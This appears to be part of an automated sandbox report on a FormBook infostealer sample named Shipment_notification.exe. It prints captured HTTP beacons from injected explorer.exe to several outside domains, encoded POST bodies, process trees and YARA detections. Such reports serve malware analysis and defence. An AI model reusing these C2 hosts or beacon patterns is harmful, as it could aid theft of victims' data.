                                                                              Data Ascii: d89]m6E%4k.H;@i\R%e?)YNn>lv)rHCr8|F>?sZ^Ypw>+dt^FFlFW,(ij"[h&Mib6gM;{CZn\Jd>0|n=Ma1_PG8&Um3
                                                                              Mar 20, 2023 16:49:55.616391897 CET122INData Raw: 20 99 fa 51 c8 f1 a9 ef 73 f8 20 0b a1 1d 95 fc 05 0c 71 e9 86 a7 83 e9 3f f4 ee ee f5 23 5d fc 12 64 7a 06 46 72 71 5f 10 86 a4 6f 9a db 54 7d cc 45 2e e5 00 2c f3 aa 66 a6 87 b5 9e 45 b1 0a b8 9a de 7a 31 d5 01 75 f0 1e 7e 4c 5e da f6 70 e1 f7
                                                                              Data Ascii: Qs q?#]dzFrq_oT}E.,fEz1u~L^p( ?F5c:Yf-@mE, P~l9(_U+oy)E?/++!ed1Qs}@aC"BAs&Q9[
                                                                              Mar 20, 2023 16:49:55.616436005 CET122INData Raw: e8 9e 2f 47 f5 9a ca 32 41 55 b5 30 c1 a0 3c f2 f3 3b c1 f8 99 0c 8b 72 ae c9 9d 87 c6 3e a4 fb 05 e4 fe 18 ec 96 73 cd f7 12 9a e9 a0 a3 f9 d7 ba b0 9b ec d8 0e e7 f0 33 9b 78 59 16 34 77 16 88 5c 2b 2f 25 2b 4f 5f 78 09 04 fa ed 06 fc a0 8f 36
                                                                              Data Ascii: /G2AU0<;r>s3xY4w\+/%+O_x6JbKI';84IK|ewW&vEw{Z4.*4w-K0\2CpJHtbC+*^6u5wNC;r#_-u!jC
                                                                              Mar 20, 2023 16:49:55.636303902 CET124INData Raw: 61 37 34 0d 0a ec 1d 5d 6f db 46 f2 39 ff 62 cf 81 81 a4 35 63 52 d4 07 25 bb c2 a5 c1 b9 4f 97 87 36 07 b4 4f 01 2d 51 12 51 89 64 25 da 96 6d f4 07 dd df e8 2f 3b cc ee 0c 77 96 5c 8a d4 07 8c 5c 61 24 b1 99 e1 72 96 9c 9d 99 9d af dd a5 4d 28
                                                                              Data Ascii: a74]oF9b5cR%O6O-QQd%m/;w\\a$rM(uY\o7~]AcWs&6NB{UR'coK_r&,81OuL$5Ed9RVV F3mBC2=Hq\#, A<c,-A{xE
                                                                              Mar 20, 2023 16:49:55.636338949 CET125INData Raw: 3c 74 dc 00 96 91 50 06 53 e5 12 21 b4 54 80 30 0f 59 84 9b e8 55 5e 32 7e 69 a7 c0 9e b9 69 7a f1 12 4d 60 6b 7e 06 42 a4 3b 73 d3 16 4c fb e7 a6 2d 48 0e cf 4d 23 32 66 a5 8e c4 db 8e 07 7f ae 30 13 9d 43 d5 21 4f 4d f3 04 73 29 5b cd 9b 15 e9
                                                                              Data Ascii: <tPS!T0YU^2~iizM`k~B;sL-HM#2f0C!OMs)[eMT*cUm4*d5B7g"H+^3eu\69MCQPT24i{42aW#1`=b0.Tph|g7*
                                                                              Mar 20, 2023 16:49:55.636357069 CET125INData Raw: d2 3f a7 e9 2a 8c 13 70 88 38 df b3 75 32 86 0c 54 b9 ff 71 36 f5 5c 63 07 6b 84 30 ee 87 52 ac 06 9d 4f 68 80 f9 f1 fa e5 68 2f ab 5d 55 dd 02 1c 5e 95 26 b9 3a 61 fe 87 b3 7f 7d bc b9 b9 b9 39 1b 8b 4f 69 f6 28 e7 7f f1 d7 7f 05 6c c1 2f 1c 11
                                                                              Data Ascii: ?*p8u2Tq6\ck0ROhh/]U^&:a}9Oi(l/.jFMoW4?
                                                                              Mar 20, 2023 16:49:55.638071060 CET126INData Raw: 66 61 0d 0a 95 5d cd 8a c2 30 10 be fb 14 a5 e2 ce c9 a6 5b 05 97 b5 89 88 6f b0 6f 10 db 54 53 d2 24 64 a2 ac 6f bf 64 6a d7 83 20 78 0d 03 5f 72 cc 37 df 4f b2 8c 8f f2 00 51 53 d3 40 50 86 e7 3e 28 e3 64 fb 44 3c 39 1b 27 26 40 7a 8d f4 85 6d
                                                                              Data Ascii: fa]0[ooTS$dodj x_r7OQS@P>(dD<9'&@zmwCxrQ(TC"d&8DI[Kmp,RR<(;g@F1Lnt>k{UlP111GjG o^#2W}"snq1fG


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              4192.168.2.549700206.54.190.3080C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 20, 2023 16:49:58.125310898 CET126OUTGET /rs5b/?uyxvg=nOUSwineJuxPGPhQvt4EE68jEsCX+f+F3Zzf53EwbVXghGVs+qBfV9lnV789trdHPD+OYXwXTJgtqB6myIQJ1SqB2q7gB4Y0Vw==&L6HRe=HinkmsLDjhA HTTP/1.1
                                                                              Host: www.carcosainvest.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Mar 20, 2023 16:49:58.301676989 CET127INHTTP/1.1 301 Moved Permanently
                                                                              Connection: close
                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                                              content-type: text/html; charset=UTF-8
                                                                              x-redirect-by: WordPress
                                                                              location: http://carcosainvest.com/rs5b/?uyxvg=nOUSwineJuxPGPhQvt4EE68jEsCX+f+F3Zzf53EwbVXghGVs+qBfV9lnV789trdHPD+OYXwXTJgtqB6myIQJ1SqB2q7gB4Y0Vw==&L6HRe=HinkmsLDjhA
                                                                              content-length: 0
                                                                              date: Mon, 20 Mar 2023 15:49:58 GMT
                                                                              server: LiteSpeed


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              5192.168.2.549701199.59.243.22380C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 20, 2023 16:50:03.374115944 CET128OUTPOST /rs5b/ HTTP/1.1
                                                                              Host: www.piergitarshoes.com
                                                                              Connection: close
                                                                              Content-Length: 187
                                                                              Cache-Control: no-cache
                                                                              Origin: http://www.piergitarshoes.com
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://www.piergitarshoes.com/rs5b/
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate
                                                                              Data Raw: 75 79 78 76 67 3d 7e 6a 7a 4d 68 55 53 42 31 53 6c 4b 58 34 70 66 36 72 63 33 71 6e 54 4d 49 49 61 59 7e 6f 7e 41 69 46 47 35 65 45 4a 54 44 62 46 74 39 45 4b 6c 33 33 76 75 4d 73 66 55 76 37 62 61 44 61 70 32 4d 4c 59 50 43 51 51 5f 4c 69 67 31 73 43 31 77 30 44 74 75 6e 7a 4f 72 70 32 68 4a 46 69 6f 4d 4c 4b 34 46 4b 78 48 4f 51 71 6d 4a 6c 34 44 4f 51 79 46 62 6d 4e 67 5f 34 51 50 33 47 79 71 59 37 4f 68 6a 49 59 39 34 42 7a 5a 4c 71 6a 31 64 51 33 34 48 4f 69 39 44 46 6f 59 72 38 77 57 54 28 34 6d 51 51 77 7a 62 71 73 6e 37 6a 7a 4a 59 35 67 29 2e 00 00 00 00 00 00 00 00
                                                                              Data Ascii: uyxvg=~jzMhUSB1SlKX4pf6rc3qnTMIIaY~o~AiFG5eEJTDbFt9EKl33vuMsfUv7baDap2MLYPCQQ_Lig1sC1w0DtunzOrp2hJFioMLK4FKxHOQqmJl4DOQyFbmNg_4QP3GyqY7OhjIY94BzZLqj1dQ34HOi9DFoYr8wWT(4mQQwzbqsn7jzJY5g).
                                                                              Mar 20, 2023 16:50:03.574099064 CET129INHTTP/1.1 200 OK
                                                                              Server: openresty
                                                                              Date: Mon, 20 Mar 2023 15:50:03 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: parking_session=78d2fda6-79af-ab0e-57f5-693bd65e7dc9; expires=Mon, 20-Mar-2023 16:05:03 GMT; Max-Age=900; path=/; HttpOnly
                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bC5E8z7aZhepQNxVi/sLuxzwnjIo5kRL8VbT4HUby+20ViRXfVasqOndIFhpS42+RxePkGsnkuvXvmghzumwkA==
                                                                              Cache-Control: no-cache
                                                                              Accept-CH: sec-ch-prefers-color-scheme
                                                                              Critical-CH: sec-ch-prefers-color-scheme
                                                                              Vary: sec-ch-prefers-color-scheme
                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                              Cache-Control: no-store, must-revalidate
                                                                              Cache-Control: post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              Content-Encoding: gzip
                                                                              Data Raw: 33 39 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 7d 54 d9 72 a3 38 14 fd 15 8f 5f fa a1 27 36 4b 70 ec 1e e3 2a bc 60 43 00 07 cc fe 32 05 92 62 04 62 09 60 b6 af 6f 25 dd d5 f3 36 2f aa ba ba e7 dc f5 48 db bf 60 09 da b1 42 b3 a4 cd c9 6e fb 79 ce 60 d4 46 4f 11 8c 49 09 b2 0c 8d e2 5c 97 fb fe 68 06 ea 6b 19 2a 49 07 0c c9 3c ed f7 a6 74 bc f5 52 7f 93 d4 bd 64 1c eb 8a 23 d3 8b 74 cd a5 63 64 ac 5b 49 60 b4 c6 03 a9 26 8f a6 0c e2 e5 1b 67 0f 40 58 97 c1 15 29 5a cc 77 fb fe 45 5d bd 3f 57 51 9e 49 a6 7b 33 1f 1f 41 f3 3a f0 c1 04 9d cb a1 8b dd b0 93 9d e6 20 f5 27 49 32 45 f1 df f8 20 9c d6 d3 4b 14 26 a8 32 8d c1 c5 cb 46 7b 0c 53 5f a4 4a 29 64 96 b6 76 63 fb f9 e2 c4 e3 77 8e 71 b1 e5 bf bb 51 f3 71 2d a0 22 27 d5 ed 99 fb 6e 0d e8 2d 3b 37 45 f6 e8 fc 2e bf 27 d3 23 ef 33 49 14 e7 b4 63 14 c1 dd 36 47 6d 34 03 49 54 37 a8 15 e7 8f f6 fd 69 4d 7d 5f b7 45 94 23 71 de 61 d4 57 65 dd ce 67 a0 2c 5a 54 50 54 8f 61 9b 88 10 75 18 a0 a7 2f e3 ef 19 2e 70 8b 23 f2 d4 80 88 20 91 a5 31 08 2e b2 59 8d 88 38 af 6a 44 b9 05 02 34 48 52 a3 77 71 9e b4 6d d5 fc 58 2e fb
                                                                              Data Ascii: 39c}Tr8_'6Kp*`C2bb`o%6/H`Bny`FOI\hk*I<tRd#tcd[I`&g@X)ZwE]?WQI{3A: 'I2E K&2F{S_J)dvcwqQq-"'n-;7E.'#3Ic6Gm4IT7iM}_E#qaWeg,ZTPTau/.p# 1.Y8jD4HRwqmX.
                                                                              Mar 20, 2023 16:50:03.574167013 CET130INData Raw: be 5f dc cb f2 4e d0 02 94 39 4d 51 97 4d 53 d6 f8 8e 8b dd 76 f9 ab c2 b8 84 e3 6e 0b 71 37 c3 50 9c b7 51 7d 47 34 4e d3 8e 34 cf b7 b2 8a 00 6e c7 1f 33 e6 1b 25 50 d0 6e db 80 1a 57 ed ae c7 05 2c fb 45 15 d5 d9 4c 9c cd d1 a8 b2 d0 23 99 92
                                                                              Data Ascii: _N9MQMSvnq7PQ}G4N4n3%PnW,EL#L,Hb6=lS5lr3<juA=gy,1#>)q&c|PVJ0"h<(!GW!`c_O4JOB}=Zv@s'H|G>Pkth


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              6192.168.2.549702199.59.243.22380C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 20, 2023 16:50:05.917395115 CET131OUTGET /rs5b/?uyxvg=zhbsihX/pGFJaZpy6dND3H78PJ7JxpKHxXOuen1DNaNorGCumHf7SvafvJLlAK1tbLNpDx0WdS8kjnRSnmRz/gORsH5hLjUWLg==&L6HRe=HinkmsLDjhA HTTP/1.1
                                                                              Host: www.piergitarshoes.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Mar 20, 2023 16:50:06.120157957 CET132INHTTP/1.1 200 OK
                                                                              Server: openresty
                                                                              Date: Mon, 20 Mar 2023 15:50:06 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: parking_session=72a77ed9-324c-f8b9-3fdc-c45079d6f10c; expires=Mon, 20-Mar-2023 16:05:06 GMT; Max-Age=900; path=/; HttpOnly
                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JosIWf3SlvYIx3mFpqMvziCBEH8tMzjdQpQAbU20HZ/amQCUrpnIDEaFuVLekt2tLmUCUwyXzDBSc8jzW9Nvgw==
                                                                              Cache-Control: no-cache
                                                                              Accept-CH: sec-ch-prefers-color-scheme
                                                                              Critical-CH: sec-ch-prefers-color-scheme
                                                                              Vary: sec-ch-prefers-color-scheme
                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                              Cache-Control: no-store, must-revalidate
                                                                              Cache-Control: post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              Data Raw: 34 63 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4a 6f 73 49 57 66 33 53 6c 76 59 49 78 33 6d 46 70 71 4d 76 7a 69 43 42 45 48 38 74 4d 7a 6a 64 51 70 51 41 62 55 32 30 48 5a 2f 61 6d 51 43 55 72 70 6e 49 44 45 61 46 75 56 4c 65 6b 74 32 74 4c 6d 55 43 55 77 79 58 7a 44 42 53 63 38 6a 7a 57 39 4e 76 67 77 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65
                                                                              Data Ascii: 4cb<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JosIWf3SlvYIx3mFpqMvziCBEH8tMzjdQpQAbU20HZ/amQCUrpnIDEaFuVLekt2tLmUCUwyXzDBSc8jzW9Nvgw=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" hre
                                                                              Mar 20, 2023 16:50:06.120187044 CET133INData Raw: 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69 74
                                                                              Data Ascii: f="https://www.google.com" crossorigin></head><body><div id="target" style='opacity: 0'></div><script>window.park = "eyJ1dWlkIjoiNzJhNzdlZDktMzI0Yy1mOGI5LTNmZGMtYzQ1MDc5ZDZmMTBjIiwicGFnZV90aW1lIjoxNjc5MzI3NDA2LCJwYWdlX3VybCI6Imh0dHA6XC9cL3d3dy
                                                                              Mar 20, 2023 16:50:06.120206118 CET133INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              7192.168.2.549703154.218.155.880C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 20, 2023 16:50:17.533485889 CET135OUTPOST /rs5b/ HTTP/1.1
                                                                              Host: www.ywtxsm.com
                                                                              Connection: close
                                                                              Content-Length: 187
                                                                              Cache-Control: no-cache
                                                                              Origin: http://www.ywtxsm.com
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://www.ywtxsm.com/rs5b/
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate
                                                                              Data Raw: 75 79 78 76 67 3d 50 47 36 75 30 55 43 37 51 4e 52 56 53 32 47 4a 65 45 36 54 64 48 56 4b 51 63 4c 6d 38 69 46 35 4b 68 72 68 34 70 35 58 31 68 37 7a 79 51 30 4c 28 35 6a 4d 56 66 28 6a 74 5a 55 55 32 59 35 39 39 42 6c 77 76 68 35 53 61 59 32 7a 5a 73 44 4b 57 39 5a 49 5a 4c 58 54 4d 70 6e 76 65 75 49 48 54 49 66 50 56 33 59 4e 38 66 62 61 42 6d 4c 32 4f 45 4e 77 69 69 69 58 4d 4e 34 4d 78 5a 6e 68 30 6c 62 35 72 6d 39 79 31 6b 56 6c 73 30 79 69 77 63 61 41 4b 54 36 79 59 78 6a 42 42 52 6d 51 77 49 48 64 72 77 37 43 42 73 58 41 34 30 72 58 66 51 29 2e 00 00 00 00 00 00 00 00
                                                                              Data Ascii: uyxvg=PG6u0UC7QNRVS2GJeE6TdHVKQcLm8iF5Khrh4p5X1h7zyQ0L(5jMVf(jtZUU2Y599Blwvh5SaY2zZsDKW9ZIZLXTMpnveuIHTIfPV3YN8fbaBmL2OENwiiiXMN4MxZnh0lb5rm9y1kVls0yiwcaAKT6yYxjBBRmQwIHdrw7CBsXA40rXfQ).
                                                                              Mar 20, 2023 16:50:17.879627943 CET135INHTTP/1.1 400 Bad Request
                                                                              Server: nginx
                                                                              Date: Mon, 20 Mar 2023 15:50:17 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: d404 Not Found0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              8192.168.2.549704154.218.155.880C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 20, 2023 16:50:21.020230055 CET136OUTGET /rs5b/?uyxvg=CESO3iylK7QUfFCiUFLwHXxmSIHW1gBrGCjGxLpE4g3q3SI6yIOiTvn7qrQa9OdkrAgYihNybI2hWOHGXNYRIortSIS8Lcg0Kg==&L6HRe=HinkmsLDjhA HTTP/1.1
                                                                              Host: www.ywtxsm.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Mar 20, 2023 16:50:21.300268888 CET136INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Mon, 20 Mar 2023 15:50:21 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 1.0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              9192.168.2.549705198.177.124.5780C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 20, 2023 16:50:26.541023970 CET137OUTPOST /rs5b/ HTTP/1.1
                                                                              Host: www.peramid.xyz
                                                                              Connection: close
                                                                              Content-Length: 187
                                                                              Cache-Control: no-cache
                                                                              Origin: http://www.peramid.xyz
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://www.peramid.xyz/rs5b/
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate
                                                                              Data Raw: 75 79 78 76 67 3d 6b 4e 49 33 52 4d 52 50 72 2d 32 47 68 42 4a 56 37 6b 51 76 38 65 6c 30 46 72 73 77 79 61 70 38 57 56 55 6f 38 77 6d 63 70 74 71 6e 6a 45 35 41 52 4f 45 5a 74 71 37 46 74 54 4e 49 28 78 44 55 61 6c 73 70 6e 33 28 37 56 70 61 79 7a 6c 6a 58 59 72 4c 30 51 35 46 7a 53 6d 49 73 4e 78 55 5f 37 2d 56 34 4c 36 71 36 73 61 70 79 32 4f 65 57 32 74 46 57 66 7a 5a 6e 56 50 4d 55 52 75 44 41 7e 50 65 4c 34 61 74 77 6e 52 31 4b 79 41 63 71 6a 32 77 67 57 44 38 75 43 6f 58 6f 33 4d 7e 44 41 45 62 73 37 46 69 45 68 65 54 75 66 66 54 4c 4f 77 29 2e 00 00 00 00 00 00 00 00
                                                                              Data Ascii: uyxvg=kNI3RMRPr-2GhBJV7kQv8el0Frswyap8WVUo8wmcptqnjE5AROEZtq7FtTNI(xDUalspn3(7VpayzljXYrL0Q5FzSmIsNxU_7-V4L6q6sapy2OeW2tFWfzZnVPMURuDA~PeL4atwnR1KyAcqj2wgWD8uCoXo3M~DAEbs7FiEheTuffTLOw).
                                                                              Mar 20, 2023 16:50:26.815551043 CET138INHTTP/1.1 404 Not Found
                                                                              Date: Mon, 20 Mar 2023 15:50:26 GMT
                                                                              Server: Apache
                                                                              Content-Length: 389
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:16:48:46
                                                                              Start date:20/03/2023
                                                                              Path:C:\Users\user\Desktop\Shipment_notification.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\Shipment_notification.exe
                                                                              Imagebase:0x1a0000
                                                                              File size:772096 bytes
                                                                              MD5 hash:C310A64AF890AC32ABFF89E86CB53A33
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Reputation:low

                                                                              General

                                                                              Target ID:1
                                                                              Start time:16:48:57
                                                                              Start date:20/03/2023
                                                                              Path:C:\Users\user\Desktop\Shipment_notification.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Users\user\Desktop\Shipment_notification.exe
                                                                              Imagebase:0x300000
                                                                              File size:772096 bytes
                                                                              MD5 hash:C310A64AF890AC32ABFF89E86CB53A33
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low

                                                                              General

                                                                              Target ID:2
                                                                              Start time:16:48:57
                                                                              Start date:20/03/2023
                                                                              Path:C:\Users\user\Desktop\Shipment_notification.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\Shipment_notification.exe
                                                                              Imagebase:0xfc0000
                                                                              File size:772096 bytes
                                                                              MD5 hash:C310A64AF890AC32ABFF89E86CB53A33
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              Reputation:low

                                                                              General

                                                                              Target ID:3
                                                                              Start time:16:49:00
                                                                              Start date:20/03/2023
                                                                              Path:C:\Windows\explorer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                              Imagebase:0x7ff69bc80000
                                                                              File size:3933184 bytes
                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Target ID:4
                                                                              Start time:16:49:14
                                                                              Start date:20/03/2023
                                                                              Path:C:\Windows\SysWOW64\control.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\control.exe
                                                                              Imagebase:0x880000
                                                                              File size:114688 bytes
                                                                              MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
